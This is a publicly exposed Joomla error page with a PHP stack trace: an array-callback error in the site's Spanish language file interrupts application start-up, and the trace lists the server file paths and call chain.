Joomla\CMS\Exception\ExceptionHandler::handleException(object(Error)) (/home/eshistor/public_html/libraries/src/Application/CMSApplication.php:322) at Joomla\CMS\Application\CMSApplication->execute() (/home/eshistor/public_html/includes/app.php:61) at require_once('/home/eshistor/public_html/includes/app.php') (/home/eshistor/public_html/index.php:32) |
[1/2]
Error
|
---|
Error: Array callback has to contain indices 0 and 1 at /home/eshistor/public_html/language/es-ES/es-ES.localise.php:1 at require_once() (/home/eshistor/public_html/libraries/src/Language/Language.php:232) at Joomla\CMS\Language\Language->__construct('es-ES', false) (/home/eshistor/public_html/libraries/src/Language/LanguageFactory.php:35) at Joomla\CMS\Language\LanguageFactory->createLanguage('es-ES', false) (/home/eshistor/public_html/libraries/src/Language/CachingLanguageFactory.php:45) at Joomla\CMS\Language\CachingLanguageFactory->createLanguage('es-ES', false) (/home/eshistor/public_html/libraries/src/Language/Language.php:293) at Joomla\CMS\Language\Language::getInstance('es-ES', false) (/home/eshistor/public_html/libraries/src/Application/CMSApplication.php:715) at Joomla\CMS\Application\CMSApplication->initialiseApp(array('language' => 'es-ES')) (/home/eshistor/public_html/libraries/src/Application/SiteApplication.php:635) at Joomla\CMS\Application\SiteApplication->initialiseApp() (/home/eshistor/public_html/libraries/src/Application/SiteApplication.php:226) at Joomla\CMS\Application\SiteApplication->doExecute() (/home/eshistor/public_html/libraries/src/Application/CMSApplication.php:293) at Joomla\CMS\Application\CMSApplication->execute() (/home/eshistor/public_html/includes/app.php:61) at require_once('/home/eshistor/public_html/includes/app.php') (/home/eshistor/public_html/index.php:32) |